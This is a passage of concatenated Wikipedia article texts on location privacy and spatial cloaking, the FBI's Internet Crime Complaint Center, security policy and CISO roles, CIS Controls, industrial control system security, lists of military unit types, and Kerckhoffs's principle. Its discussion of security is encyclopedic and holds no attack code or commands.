uncertainty would be introduced when the adversaries try to match the user to either a known location identity or external observation of location identity.[8]Location perturbation is usually satisfied by using spatial cloaking, temporal cloaking, or locationobfuscation.[3]Spatial and temporal cloaking refers to the wrong or imprecise location and time reported to the service providers, instead of the exact information.[6][9]For example, location privacy could be enhanced by increasing the time between location reports, since higher report frequencies makes reidentification more possible to happen through data mining.[9][14]There are other cases when the report of location information is delayed until the visit of K users is identified in that region.[2] However, this approach could affect the service reported by the service providers since the data they received are not accurate. The accuracy and timelessness issues are usually discussed in this approach. Also, some attacks have been recognized based on the idea of cloaking and break user privacy.[6] Based on the idea oflandmarkobjects, a particular landmark or a significant object is reported to the service provider, instead of a region.[3] In order to avoid location tracking, usually less or no location information would be reported to the service provider.[3]For example, when requesting weather, a zip code instead of a tracked location would be accurate enough for the quality of the service received.[9] A centralized scheme is constructed based on a central location anonymizer (anonymizing server) and is considered as an intermediate between the user and the service provider.[15][16]Generally, the responsibilities of a location anonymizer include tracking users' exact location,[15]blurring user specific location information into cloaked areas and communicate with the service provider.[1][12]For example, one of the methods to achieve this is by replacing the correct network addresses withfake-IDsbefore the information are forward to the service provider.[7]Sometimes user identity is hidden, while still allowing the service provider to authenticate the user and possibly charge the user for the service.[7]These steps are usually achieved through spatial cloaking or path confusion. Except in some cases where the correct location information are sent for high service quality, the exact location information or temporal information are usually modified to preserve user privacy.[17] Serving as an intermediate between the user and location-based server, location anonymizer generally conducts the following activities:[3][7] The location anonymizer could also be considered as a trusted-third party[12]since it is trusted by the user with the accurate location information and private profile stored in the location anonymizer.[15]However, this could also expose users’ privacy into great risks at the same time. First, since the anonymizer keeps tracking users' information and has access to the users’ exact location and profile information, it is usually the target of most attackers and thus under higher risks[12][15]Second, the extent to which users trust the location anonymizers could be essential. If a fully trusted third party is integrated into the algorithm, user location information would be reported continuously to the location anonymizer,[12]which may cause privacy issues if the anonymizer is compromised.[16]Third, the location anonymizer may lead to a performance bottleneck when a large number of requests are presented and required to be cloaked.[15][16]This is because the location anonymizer is responsible for maintaining the number of users in a region in order to provide an acceptable level of service quality.[15] In a distributed environment, users anonymize their location information through fixed communication infrastructures, such as base stations. Usually, a certification server is introduced in a distributed scheme where users are registered. Before participating in this system, users are required to obtain a certificate which means that they are trusted. Therefore, every time after user request a location-based service and before the exact location information is forward to the server, the auxiliary users registered in this system collaborate to hide the precise location of the user. The number of assistant users involved in cloaking this region is based on K-anonymity, which is usually set be the specific user.[18]In the cases where there are not enough users nearby, S-proximity is generally adopted to generate a high number of paired user identities and location information for the actual user to be indistinguishable in the specific area.[17]The other profiles and location information sent to the service provider are sometimes also referred to as dummies.[3] However, the complexity of the data structure which is used to anonymize the location could result in difficulties when applying this mechanism to highly dynamic location-based mobile applications.[18]Also, the issue of large computation and communication is posed to the environment.[15] Apeer-to-peer(P2P) environment relies on the direct communication and information exchange between devices in a community where users could only communicate through P2Pmulti-hoproutingwithout fixed communication infrastructures.[1]The P2P environment aims to extend the scope of cellular coverage in a sparse environment.[19]In this environment, peers have to trust each other and work together, since their location information would be reported to each other when a cloaked area is constructed to achieve the desired K-anonymity during the requesting for location-based services.[1][12] Researchers have been discussing some privacy requirements and security requirements which would make the privacy-preserving techniques appropriate for the peer-to-peer environment. For example,authenticationandauthorizationare required to secure and identify the user and thus making authorized users distinguishable from unauthorized users.Confidentialityand integrity make sure that only those who are authorized have access to the data transmitted between peers, and the transmitted information cannot be modified.[19] Some of the drawbacks identified in a peer-to-peer environment are the communication costs, not enough users and threats of potential malicious users hiding in the community.[2] Mobile deviceshave been considered as an essential tool for communication, andmobile computinghas thus become a research interest in recent years.[17]From online purchase to online banking, mobile devices have frequently been connected to service providers for online activities, and at the same time sending and receiving information.[17]Generally, mobile users can receive very personal services from anywhere at any time through location-based services.[16]Inmobiledevices,Global Positioning System(GPS) is the most commonly used component to provide location information.[2]Besides that,Global System for Mobile Communications(GSM) andWiFisignals could also help with estimating locations.[2]There are generally two types of privacy concerns in mobile environments, data privacy and contextual privacy. Usually, location privacy and identity privacy are included in the discussion of contextual privacy in a mobile environment,[17]while the data transferred between various mobile devices is discussed underdata privacy.[17]In the process of requesting location-based services and exchanging location data, both the quality of data transferred and the safety of information exchanged could be potentially exposed to malicious people. No matter what the specific privacy-preserving solution is integrated to cloak a particular region in which the service requester stays. It is usually constructed from several angles to satisfy different privacy requirements better. These standards are either adjusted by the users or are decided by the application designers.[3]Some of the privacy parameters include K-anonymity, entropy, minimum area, and maximum area.[3] The concept ofK-anonymitywas first introduced in relationaldata privacyto guarantee the usefulness of the data and the privacy of users, when data holders want to release their data.[8][20][21][22]K-anonymity usually refers to the requirement that the information of the user should be indistinguishable from a minimum ofk−1{\displaystyle k-1}people in the same region, with k being any real number.[3][4][9][12][15]Thus, the disclosed location scope would be expected to keep expanding untilk{\displaystyle k}users could be identified in the region and thesek{\displaystyle k}people form an anonymity set.[9][15]Usually, the higher the K-anonymity, the stricter the requirements, the higher the level of anonymity.[7]If K-anonymity is satisfied, then the possibility of identifying the exact user would be around1/k{\displaystyle 1/k}which subjects to different algorithms, and therefore the location privacy would be effectively preserved. Usually, if the cloaking region is designed to be more significant when the algorithm is constructed, the chances of identifying the exact service requester would be much lower even though the precise location of the user is exposed to the service providers,[7]let alone the attackers' abilities to run complexmachine learningor advanced analysis techniques. Some approaches have also been discussed to introduce more ambiguity to the system, such as historical K-anonymity, p-sensitivity, andl-diversity.[4]The idea of historical K-anonymity is proposed to guarantee the moving objects by making sure that there are at leastk−1{\displaystyle k-1}users who share the same historical requests, which requires the anonymizer to track not only the current movement of the user but also the sequence location of the user.[3][4][7][15]Therefore, even user's historical location points are disclosed, the adversaries could not distinguish the specific user from a group of potential users.[7]P-sensitivity is used to ensure that the critical attributes such as the identity information have at leastp{\displaystyle p}different values withink{\displaystyle k}users.[4][23]Moreover, l-diversity aims to guarantee the user is unidentifiable from l different physical locations.[4][24] However, setting a large K value would also requires additional spatial and temporal cloaking which leads to a low resolution of information, which in turn could lead to degraded quality of service.[8] Minimum area size refers to the smallest region expanded from the exact location point which satisfies the specific privacy requirements.[3]Usually, the higher the privacy requirements, the bigger the area is required to increase the complicity of distinguishing the exact location of users. Also, the idea of minimum area is particularly important in dense areas when K-anonymity might not be efficient to provide the guaranteed privacy-preserving performance. For example, if the requestor is in a shopping mall which has a promising discount, there might be a lot of people around him or her, and thus this could be considered a very dense environment. Under such a situation, a large K-anonymity such as L=100 would only correspond to a small region, since it does not require a large area to include 100 people near the user. This might result in an inefficient cloaked area since the space where the user could potentially reside is smaller compared with the situation of the same level of K-anonymity, yet people are more scattered from each other.[3] Since there is atradeoffrelationship between quality of service and privacy requirements in most location-based services,[3][4][8]sometimes a maximum area size is also required. This is because a sizable cloaked area might introduce too much inaccuracy to the service received by the user, since increasing the reported cloaked area also increases the possible satisfying results to the user's request.[3]These solutions would match the specific requirements of the user, yet are not necessarily applicable to the users’ exact location. The cloaked region generated by the method of spatial cloaking could fit into multiple environments, such as snapshot location, continuous location, spatial networks, and wireless sensor networks.[3]Sometimes, the algorithms which generate a cloaked area are designed to fit into various frameworks without changing the original coordinate. In fact, with the specification of the algorithms and well-establishment of most generally adopted mechanisms, more privacy-preserving techniques are designed specifically for the desired environment to fit into different privacy requirements better. Geosocialapplications are generally designed to provide a social interaction based on location information. Some of the services include collaborative network services and games, discount coupons, local friend recommendation for dining and shopping, and social rendezvous.[9]For example, Motion Based allows users to share exercise path with others.[9]Foursquarewas one of the earliest location-based applications to enable location sharing among friends.[4]Moreover,SCVNGRwas a location-based platform where users could earn points by going to places.[6] Despite the privacy requirements such as K-anonymity, maximum area size, and minimum area size, there are other requirements regarding the privacy preserved in geosocial applications. For example, location and user unlinkability require that the service provider should not be able to identify the user who conducts the same request twice or the correspondence between a given cloaked area and its real-time location. Also, the location data privacy requires that the service provider should not have access to the content of data in a specific location. For example, LoX is mainly designed to satisfy these privacy requirements of geosocial applications. With the popularity and development ofglobal positioning system(GPS) andwireless communication,[16]location-based information serviceshave been in high growth in recent years.[4]It has already been developed and deployed in both the academia and the practical sphere.[8]Many practical applications have integrated the idea and techniques of location-based services,[25]such as mobile social networks, finding places of interest (POI), augmented reality (AR) games,[4]awareness of location-based advertising, transportation service,[1][12]location tracking, and location-aware services.[17]These services usually require the service providers to analyze the received location information based on their algorithms and a database to come up with an optimum solution, and then report it back to the requesting user. Usually, the location-based services are requested either through snapshot queries or continuous queries.[3]Snapshot queries generally require the report of an exact location at a specific time, such as “where is the nearest gas station?” while continuous queries need the tracking of location during a period of time, such as “constantly reporting the nearby gas stations.”[3] With the advancement of global positioning systems and the development of wireless communication which are introduced in the extensive use of location-based applications, high risks have been placed on user privacy.[8]Both the service providers and users are under the dangers of being attacked and information being abused.[8][26]It has been reported that some GPS devices have been used to exploit personal information and stalk personal locations.[3]Sometimes, only reporting location information would already indicate much private information.[3][7]One of the attacks specific to location-based services is the space or time correlated inference attacks, in which the visited location is correlated with the particular time, and this could lead to the disclosure of private life and private business.[8][27] Some of the popular location-based services include:[2][7][17] Continuous location-based service Continuous location-based services require a constant report of location information to the service providers.[12]During the process of requesting a continuous location-based service, pressure has been recognized on privacy leakage issues. Since the a series of cloaked areas are reported, with the advancing technological performances, a correlation could be generated between the blurred regions.[12]Therefore, many types of research have been conducted addressing the location privacy issues in continuous location-based services.[12] Snapshot location-based services While snapshot location generally refers to the linear relation between the specific location point and a point in the temporal coordinate. Some mechanisms have been proposed to either address the privacy-preserving issues in both of the two environments simultaneously or concentrate on fulfilling each privacy requirement respectively. For example, a privacy grid called a dynamic grid system is proposed to fit into both snapshot and continuous location-based service environments. The existing privacy solutions generally fall into two categories: data privacy and context privacy.[17]Besides addressing the issues in location privacy, these mechanisms might be applied to other scenarios. For example, tools such as cryptography, anonymity, obfuscation and caching have been proposed, discussed, and tested to better preserve user privacy. These mechanisms usually try to solve location privacy issues from different angles and thus fit into different situations. Even though the effectiveness of spatial cloaking has been widely accepted and the idea of spatial cloaking has been integrated into multiple designs, there are still some concerns towards it. First, the two schemes of spatial cloaking both have their limitations. For example, in the centralized scheme, although users' other private information including identity has been cloaked, the location itself would be able to release sensitive information,[15]especially when a specific user requests service for multiple times with the same pseudonym.[7]In a decentralized scheme, there are issues with large computation and not enough peers in a region. Second, the ability of attackers requires a more in-depth consideration and investigation according to the advancement of technology such as machine learning and its connection with social relations, particularly the share of information online. Third, the credibility of a trusted-third-party has also been identified as one of the issues. There is a large number of software published on app markets every day, and some of them have not undergone a strict examination. Software bugs, configuration errors at the trusted-third-party and malicious administrators could expose private user data under high risks.[6]Based on a study from 2010, two-thirds of all the trusted-third-party applications in theAndroidmarket are considered to be suspicious towards sensitive information.[17] Fourth, location privacy has been recognized as a personalized requirement and is sensitive to various contexts.[8]Customizing privacy parameters has been exploring in recent years since different people have different expectations on the amount of privacy preserved and sometimes the default settings do not fully satisfy user needs.[4][28]Considering that there is often a trade-off relation between privacy and personalization and personalization usually leads to better service,[4][7][8]people would have different preferences. In the situations where users can change the default configurations, accepting the default instead of customizing seems to be a more popular choice.[4][29]Also, people's attitudes towards disclosing their location information could vary based on the service's usefulness, privacy safeguards, and the disclosed quantity etc.[9]In most situations, people are weighing the price of privacy sharing and the benefits they received.[4] Fifth, there are many protection mechanism proposed in literature yet few of them have been practically integrated into commercial applications.[30]Since there is little analysis regarding the implementation of location privacy-preserving mechanisms, there is still a large gap between theory and privacy.[4] During the process of exchanging data, the three main parties—the user, the server, and the networks—can be attacked by adversaries.[4][17]The knowledge held by adversaries which could be used to carry out location attacks includes observed location information, precise location information, and context knowledge.[4]The techniques of machine learning and big data have also led to an emerging trend in location privacy,[4]and the popularity of smart devices has led to an increasing number of attacks.[17]Some of the adopted approaches include the virus, the Trojan applications, and severalcyber-attacks.[17] Man-in-the-middleattacks usually occur in the mobile environment which assumes that all the information going through the transferring process from user to the service provider could be under attacks and might be manipulated further by attackers revealing more personal information.[17] Cross-servicing attacks usually take place when users are using poorly protected wireless connectivity, especially in public places.[17] Video-based attacks are more prevalent in mobile devices usually due to the use of Bluetooth, camera, and video capacities, since there are malicious software applications secretly recording users’ behavior data and reporting that information to a remote device. Stealthy Video Capture is one of the intentionally designed applications which spies an unconscious user and further report the information.[17] Sensor sniffing attacks usually refer to the cases where intentionally designed applications are installed on a device. Under this situation, even adversaries do not have physical contact with the mobile device, users’ personal information would still under risks of being disclosed.[17] In a localization attack, contextual knowledge is combined with observed location information to disclose a precise location. The contextual knowledge can also be combined with precise location information to carry out identity attacks.[4] Integrating learning algorithms and other deep learning methods are posing a huge challenge to location privacy, along with the massive amount of data online.[4]For example, current deep learning methods can come up with predictions about geolocations based on the personal photos from social networks and performs types of object detection based on their abilities to analyze millions of photos and videos.[4][31][32] Policy approaches have also been discussed in recent years which intend to revise relevant guidelines or propose new regulations to better manage location-based service applications. The current technology state does not have a sufficiently aligned policies and legal environment, and there are efforts from both academia and industry trying to address this issue.[4]Two uniformly accepted and well- established requirements are the users' awareness of location privacy policies in a specific service and their consents of sending their personal location to a service provider.[15]Besides these two approaches, researchers have also been focusing on guarding the app markets, since an insecure app market would expose unaware users to several privacy risks. For example, there have been identified much malware in the Android app market, which are designed to carry cyber attacks on Android devices.[17]Without effective and clear guidelines to regulate location information, it would generate both ethical and lawful problems. Therefore, many guidelines have been discussed in years recently, to monitor the use of location information. European data protection guideline was recently revised to include and specify the privacy of an individual's data andpersonally identifiable information(PIIs). These adjustments intend to make a safe yet effective service environment. Specifically, location privacy is enhanced by making sure that the users are fully aware and consented on the location information which would be sent to the service providers. Another important adjustment is that a complete responsibility would be given to the service providers when users’ private information is being processed.[17] The European Union'sDirective 95/46/EC on the protection of individuals with regard to the processing of personal data and on the free movement of such dataspecifies that the limited data transfer to non-EU countries which are with "an adequate level of privacy protection".[33]The notion ofexplicit consentis also introduced in the Directive, which stated that except for legal and contractual purpose, personal data might only be processed if the user has unambiguously given his or her consent.[33] European Union'sDirective 2002/58/EC on privacy and electronic communicationexplicitly defines location information, user consent requirements and corporate disposal requirement which helps to regulate and protect European citizens' location privacy.[30]Under the situation when data are unlinkable to the user, the legal frameworks such as the EU Directive has no restriction on the collection of anonymous data.[33] The electronic communications privacy act discusses the legal framework of privacy protection and gives standards of law enforcement access to electronic records and communications.[34]It is also very influential in deciding electronic surveillance issues.[35] GSMApublished a new privacy guideline, and some mobile companies in Europe have signed it and started to implement it so that users would have a better understanding of the information recorded and analyzed when using location-based services. Also, GSMA has recommended the operating companies to inform their customers about people who have access to the users’ private information.[17] Even though many privacy preserving mechanisms have not been integrated into common use due to effectiveness, efficiency, and practicality, some location-based service providers have started to address privacy issues in their applications.[4]For example,Twitterenables its users to customize location accuracy.[4]Locations posted in Glympse will automatically expire.[4]Also, SocialRadar allows its users to choose to be anonymous or invisible when using this application.[4] It has been stated thatGoogledoes not meet theEuropean Union’s data privacy law and thus increasing attention has been placed on the advocation of guidelines and policies regarding data privacy.[17] It has been arguing that less than a week afterFacebookuses its “Places” feature, the content of that location information has been exploited by thieves and are used to conduct a home invasion.[6] In this case, the police used a beeper to keep track of the suspect's vehicle. After using the beeper alone to track the suspect, the officers secured a search warrant and confirmed that the suspect was producing illicit drugs in the van. The suspect tried to suppress the evidence based on the tracking device used during the monitoring process, but the court denied this. The court concluded that “A person traveling in an automobile on a public thouroughfare [sic] has no reasonable expectation of privacy in his movement from one place to another.”[36]Nevertheless, the court reserved the discussion of whether twenty-four-hour surveillance would constitute a search.[35][36] However, the cases usingGPSand other tracking devices are different with this case, since GPS tracking can be conducted without human interaction, while the beeper is considered as a method to increase police's sensory perception through maintaining visual contact of the suspect.[36]Police presence is required when using beepers yet is not needed when using GPS to conduct surveillance. Therefore, law enforcement agents are required to secure a warrant before obtaining vehicle's location information with the GPS tracking devices.[35] In this case (https://www.oyez.org/cases/2011/10-1259), the police had a search warrant to install Global Positioning System on a respondent wife's car, while the actual installation was on the 11th day in Maryland, instead of the authorized installation district and beyond the approved ten days. The District Court ruled that the data recorded on public roads admissible since the respondent Jones had no reasonable exception of privacy in public streets, yet the D.C. Circuit reversed this through the violation of the Fourth Amendment of unwarranted use of GPS device.[37]
https://en.wikipedia.org/wiki/Spatial_cloaking
Control softwaremay refer to:
https://en.wikipedia.org/wiki/Control_software_(disambiguation)
TheInternet Crime Complaint Center(IC3) is a division of theFederal Bureau of Investigation(FBI) concerning suspected Internet-facilitated criminal activity. The IC3 gives victims a convenient and easy-to-use reporting mechanism that alerts authorities of suspected criminal or civil violations on the Internet. The IC3 develops leads and notifieslaw enforcementagencies at the federal, state, local and international level. Information sent to the IC3 is analyzed and disseminated for investigative and intelligence purposes to law enforcement and for public awareness. The IC3 was founded in 2000 as theInternet Fraud Complaint Center(IFCC), and was tasked with gathering data on crimes committed online such as fraud, scams, and thefts.[1]Other crimes tracked by the center includedintellectual property rightsmatters,computer intrusions,economic espionage,online extortion, internationalmoney laundering,identity theft, and other Internet-facilitated crimes. With the realization that crimes facilitated online have a chance to overlap with other crimes, and that not all crimes committed or facilitated online are just fraud, the IFCC was renamed to the Internet Crime Complaint Center in October 2003 to better reflect the broad character of such matters, and to minimize the need for one to distinguish online fraud from other potentially overlapping cyber crimes. This United States government–related article is astub. You can help Wikipedia byexpanding it. Thiscrime-related article is astub. You can help Wikipedia byexpanding it. Thiscomputer securityarticle is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/Internet_Crime_Complaint_Center
Anetwork security policy(NSP) is a generic document that outlines rules forcomputer networkaccess, determines how policies are enforced and lays out some of the basic architecture of the companysecurity/network securityenvironment.[1]The document itself is usually several pages long and written by acommittee. Asecurity policyis a complex document, meant to govern data access,web-browsinghabits, use ofpasswords,encryption,emailattachments and more. It specifies these rules for individuals or groups of individuals throughout the company.[2]The policies could be expressed as a set of instructions that understood by special purposenetwork hardwarededicated for securing the network. Security policy should keep themalicious usersout, and also exert control over potential risky users within an organization. Understanding what information and services are available and to which users, as well as what the potential is for damage and whether any protection is already in place to prevent misuse are important when writing a network security policy. In addition, the security policy should dictate a hierarchy of access permissions, granting users access only to what is necessary for the completion of their work. TheNational Institute of Standards and Technologyprovides an example security-policy guideline.
https://en.wikipedia.org/wiki/Network_security_policy
Achief information security officer(CISO) is a senior-level executive within anorganizationresponsible for establishing and maintaining the enterprise vision, strategy, and program to ensure information assets and technologies are adequately protected. The CISO directs staff in identifying, developing, implementing, and maintaining processes across the enterprise to reduce information andinformation technology(IT) risks. They respond to incidents, establish appropriate standards and controls, manage security technologies, and direct the establishment and implementation of policies and procedures. The CISO is also usually responsible for information-related compliance (e.g. supervises the implementation to achieveISO/IEC 27001certification for an entity or a part of it). The CISO is also responsible for protecting proprietary information and assets of the company, including the data of clients and consumers. CISO works with other executives to make sure the company is growing in a responsible and ethical manner. Typically, the CISO's influence reaches the entire organization. Responsibilities may include, but not be limited to: Having a CISO or an equivalent function in organizations has become standard practice in business, government, and non-profits organizations. By 2009, approximately 85% of large organizations had a security executive, up from 56% in 2008, and 43% in 2006[citation needed]. In 2018,The Global State of Information Security Survey 2018(GSISS), a joint survey conducted by CIO, CSO, and PwC,[1][2]concluded that 85% of businesses have a CISO or equivalent. The role of CISO has broadened to encompass risks found inbusiness processes, information security, customer privacy, and more. As a result, there is a trend now to no longer embed the CISO function within the IT group. In 2019, only 24% of CISOs report to achief information officer(CIO), while 40% report directly to achief executive officer(CEO), and 27% bypass the CEO and report to the board of directors. Embedding the CISO function under the reporting structure of the CIO is considered suboptimal, because there is a potential for conflicts of interest and because the responsibilities of the role extend beyond the nature of responsibilities of the IT group. The reporting structure for the CISO can vary depending on the organization’s size, industry, regulatory environment, and risk profile. However, the importance of information security in today’s businesses has raised the CISO’s role to become a senior-level position.[3] In corporations, the trend is for CISOs to have a strong balance of business acumen and technology knowledge. CISOs are often in high demand and compensation is comparable to other C-level positions that also hold a similarcorporate title. A typical CISO holds non-technical certifications (likeCISSPandCISM), although a CISO coming from a technical background will have an expanded technical skillset. Other typical training includes project management to manage the information security program, financial management (e.g. holding anaccreditedMBA) to manage infosec budgets, and soft-skills to direct heterogeneous teams of information security managers, directors of information security, security analysts, security engineers and technology risk managers. Recently, given the involvement of CISO with Privacy matters, certifications likeCIPPare highly requested. A recent development in this area is the emergence of "Virtual" CISOs (vCISO, also called "Fractional CISO").[4][5]These CISOs work on a shared or fractional basis, for organizations that may not be large enough to support a full-time executive CISO, or that may wish to, for a variety of reasons, have a specialized external executive performing this role. vCISOs typically perform similar functions to traditional CISOs, and may also function as an "interim" CISO while a company normally employing a traditional CISO is searching for a replacement.[6]Key areas that vCISOs can support an organization include: Thiscomputer securityarticle is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/Chief_information_security_officer
TheCIS Controls(formerly called theCenter for Internet Security Critical Security Controls for Effective Cyber Defense) is a publication ofbest practiceguidelines forcomputer security. The project was initiated early in 2008 in response to extreme data losses experienced by organizations in the US defense industrial base.[1]The publication was initially developed by theSANS Instituteand released as the "SANS Top 20." Ownership was then transferred to the Council on Cyber Security (CCS) in 2013, and then transferred toCenter for Internet Security(CIS) in 2015. CIS released version 8 of the CIS Controls in 2021.[2] The guidelines consist of 18 (originally 20) key actions, called critical security controls (CSC), that organizations should implement to block or mitigate known attacks. The controls are designed so that primarily automated means can be used to implement, enforce and monitor them.[3]The security controls give no-nonsense, actionable recommendations for cyber security, written in language that’s easily understood byITpersonnel.[4]Goals of the Consensus Audit Guidelines include CIS Benchmarks cover a wide range of technologies, including:
https://en.wikipedia.org/wiki/The_CIS_Critical_Security_Controls_for_Effective_Cyber_Defense
Control system security, orautomation and control system (ACS) cybersecurity, is the prevention of (intentional or unintentional) interference with the proper operation ofindustrial automationandcontrol systems. These control systems manage essential services including electricity, petroleum production, water, transportation, manufacturing, and communications. They rely on computers, networks, operating systems, applications, andprogrammable controllers, each of which could containsecurity vulnerabilities. The 2010 discovery of theStuxnet wormdemonstrated the vulnerability of these systems to cyber incidents.[1]The United States and other governments have passedcyber-security regulationsrequiring enhanced protection for control systems operating critical infrastructure. Control system security is known by several other names such asSCADAsecurity,PCN security,Industrialnetwork security,Industrial control system(ICS) Cybersecurity,Operational Technology(OT) Security, Industrial automation and control systemsandControl System Cyber Security. Insecurity of, or vulnerabilities inherent in automation and control systems (ACS) can lead to severe consequences in categories such as safety, loss of life, personal injury, environmental impact, lost production, equipment damage, information theft, and company image. Guidance to assess, evaluate and mitigate these potential risks is provided through the application of many Governmental, regulatory, industry documents and Global Standards, addressed below. Automation and Control Systems (ACS) have become far more vulnerable to security incidents due to the following trends. The U.S. GovernmentComputer Emergency Readiness Team(US-CERT) originally instituted acontrol systems security program(CSSP) now the National Cybersecurity and Communications Integration Center (NCCIC) Industrial Control Systems, which has made available a large set of free National Institute of Standards and Technology (NIST) standards documents regarding control system security.[3]The U.S. Government Joint Capability Technology Demonstration (JCTD) known as MOSIACS (More Situational Awareness for Industrial Control Systems) is the initial demonstration of cybersecurity defensive capability for critical infrastructure control systems.[4]MOSAICS addresses the Department of Defense (DOD) operational need for cyber defense capabilities to defend critical infrastructure control systems from cyber attack, such as power, water and wastewater, and safety controls, affect the physical environment.[5]The MOSAICS JCTD prototype will be shared with commercial industry through Industry Days for further research and development, an approach intended to lead to an innovative, game-changing capabilities for cybersecurity for critical infrastructure control systems.[6] The international standard for cybersecurity of automation and control systems is theIEC 62443. In addition, multiple national organizations such as the NIST and NERC in the USA released guidelines and requirements for cybersecurity in control systems. The IEC 62443 cybersecurity standards define processes, techniques and requirements for Automation and Control Systems (IACS). The IEC 62443 standards and technical reports are organized into four general categories calledGeneral,Policies and Procedures,System,Component,ProfilesandEvaluation. The most widely recognized and latest NERC security standard is NERC 1300, which is a modification/update of NERC 1200. The latest version of NERC 1300 is called CIP-002-3 through CIP-009-3, with CIP referring to Critical Infrastructure Protection. These standards are used to secure bulk electric systems although NERC has created standards within other areas. The bulk electric system standards also provide network security administration while still supporting best-practice industry processes. Although it is not a standard, theNIST Cybersecurity Framework(NIST CSF) provides a high-level taxonomy of cybersecurity outcomes and a methodology to assess and manage those outcomes. It is intended to help private sector organizations that providecritical infrastructurewith guidance on how to protect it.[7] NIST Special Publication 800-82 Rev. 2 "Guide to Industrial Control System (ICS) Security" describes how to secure multiple types of Industrial Control Systems against cyber attacks while considering the performance, reliability, and safety requirements specific to ICS.[8] Certifications for control system security have been established by several global Certification Bodies. Most of the schemes are based on theIEC 62443and describe test methods, surveillance audit policy, public documentation policies, and other specific aspects of their program.
https://en.wikipedia.org/wiki/Control_system_security
Many countries around the world maintain military units that are specifically trained to cope withCBRN(Chemical, Biological, Radiological, Nuclear) threats. Beside this specialized units, most modern armed forces undergo generalized basic CBRN self-defense training for all their personnel. Army Navy Nuclear Biological Chemical Defense Special Joint Battalion (Ειδικό Διακλαδικό Λόχο Πυρηνικής Βιολογικής Χημικής Άμυνας - Eidikó Diakladikó Lócho Pyrinikís Viologikís Chimikís Ámynas)[57] Army Air Force Integrated Defence Staff National Disaster Response Force Central Industrial Security Force Central Reserve Police Force Border Security Force Islamic Revolutionary Guard Corps Inter-services Army Navy Air Force Army Army Reserve Army National Guard Navy Marines Air Force Coast Guard [208] JointArmy National GuardandAir National Guard
https://en.wikipedia.org/wiki/List_of_CBRN_warfare_forces
Many countries around the world maintainmarinesandnaval infantrymilitary units. Even if only a few nations have the capabilities to launch major amphibious assault operations, most marines and naval infantry forces are able to carry out limitedamphibious landings, riverine andcoastal warfaretasks. The list includes also army units specifically trained to operate as marines or naval infantry forces, and navy units with specialized naval security and boarding tasks. TheMarine Fusiliers Regimentsare the marine infantry regiments of theAlgerian Navyand they are specialised inamphibious warfare.[1] The RFM have about 7000 soldiers in their ranks. Within the Algerian navy there are 8 regiments of marine fusiliers: Future marine fusiliers andmarine commandosare trained in: Army Navy Army Navy The IDF's35th Parachute Brigade "Flying Serpent"is aparatroopersbrigade that also exercises sea landing capabilities. The Italian Army'sCavalry Brigade "Pozzuolo del Friuli"forms with theItalian Navy's 3rd Naval Division andSan Marco Marine BrigadetheItalian military's National Sea Projection Capability (Forza di proiezione dal mare). Additionally the 17th Anti-aircraft Artillery Regiment "Sforzesca" provides air-defense assets:
https://en.wikipedia.org/wiki/List_of_marines_and_similar_forces
Many countries around the world maintain military units that are specifically trained forskiandmountain troopstasks. The list does not include non-mountainspecial forcesunits, even if several of them have some mountain warfare capabilities. Militia units (Miliz):[46]
https://en.wikipedia.org/wiki/List_of_mountain_warfare_forces
Many countries around the world maintain military units that are trained asparatroopers. These includespecial forcesunits that are parachute-trained, as well as non-airborne forcesunits. Special Operations Regiment (Kenya) Army Air Force
https://en.wikipedia.org/wiki/List_of_paratrooper_forces
Kerckhoffs's principle(also calledKerckhoffs's desideratum,assumption,axiom,doctrineorlaw) ofcryptographywas stated byDutch-borncryptographerAuguste Kerckhoffsin the 19th century. The principle holds that acryptosystemshould be secure, even if everything about the system, except thekey, is public knowledge. This concept is widely embraced by cryptographers, in contrast tosecurity through obscurity, which is not. Kerckhoffs's principle was phrased by American mathematicianClaude Shannonas "theenemyknows the system",[1]i.e., "one ought to design systems under the assumption that the enemy will immediately gain full familiarity with them". In that form, it is calledShannon's maxim. Another formulation by American researcher and professorSteven M. Bellovinis: In other words—design your system assuming that your opponents know it in detail. (A former official at NSA's National Computer Security Center told me that the standard assumption there was that serial number 1 of any new device was delivered to the Kremlin.)[2] The invention oftelegraphyradically changedmilitary communicationsand increased the number of messages that needed to be protected from the enemy dramatically, leading to the development of field ciphers which had to be easy to use without large confidentialcodebooksprone to capture on the battlefield.[3]It was this environment which led to the development of Kerckhoffs's requirements. Auguste Kerckhoffs was a professor of German language atEcole des Hautes Etudes Commerciales(HEC) in Paris.[4]In early 1883, Kerckhoffs's article,La Cryptographie Militaire,[5]was published in two parts in theJournal of Military Science, in which he stated six design rules for militaryciphers.[6]Translated from French, they are:[7][8] Some are no longer relevant given the ability of computers to perform complex encryption. The second rule, now known asKerckhoffs's principle, is still critically important.[9] Kerckhoffs viewed cryptography as a rival to, and a better alternative than,steganographicencoding, which was common in the nineteenth century for hiding the meaning of military messages. One problem with encoding schemes is that they rely on humanly-held secrets such as "dictionaries" which disclose for example, the secret meaning of words. Steganographic-like dictionaries, once revealed, permanently compromise a corresponding encoding system. Another problem is that the risk of exposure increases as the number of users holding the secrets increases. Nineteenth century cryptography, in contrast, used simple tables which provided for the transposition of alphanumeric characters, generally given row-column intersections which could be modified by keys which were generally short, numeric, and could be committed to human memory. The system was considered "indecipherable" because tables and keys do not convey meaning by themselves. Secret messages can be compromised only if a matching set of table, key, and message falls into enemy hands in a relevant time frame. Kerckhoffs viewed tactical messages as only having a few hours of relevance. Systems are not necessarily compromised, because their components (i.e. alphanumeric character tables and keys) can be easily changed. Using secure cryptography is supposed to replace the difficult problem of keeping messages secure with a much more manageable one, keeping relatively small keys secure. A system that requires long-term secrecy for something as large and complex as the whole design of a cryptographic system obviously cannot achieve that goal. It only replaces one hard problem with another. However, if a system is secure even when the enemy knows everything except the key, then all that is needed is to manage keeping the keys secret.[10] There are a large number of ways the internal details of a widely used system could be discovered. The most obvious is that someone could bribe, blackmail, or otherwise threaten staff or customers into explaining the system. In war, for example, one side will probably capture some equipment and people from the other side. Each side will also use spies to gather information. If a method involves software, someone could domemory dumpsor run the software under the control of a debugger in order to understand the method. If hardware is being used, someone could buy or steal some of the hardware and build whatever programs or gadgets needed to test it. Hardware can also be dismantled so that the chip details can be examined under the microscope. A generalization some make from Kerckhoffs's principle is: "The fewer and simpler the secrets that one must keep to ensure system security, the easier it is to maintain system security."Bruce Schneierties it in with a belief that all security systems must be designed tofail as gracefullyas possible: Kerckhoffs's principle applies beyond codes and ciphers to security systems in general: every secret creates a potentialfailure point. Secrecy, in other words, is a prime cause of 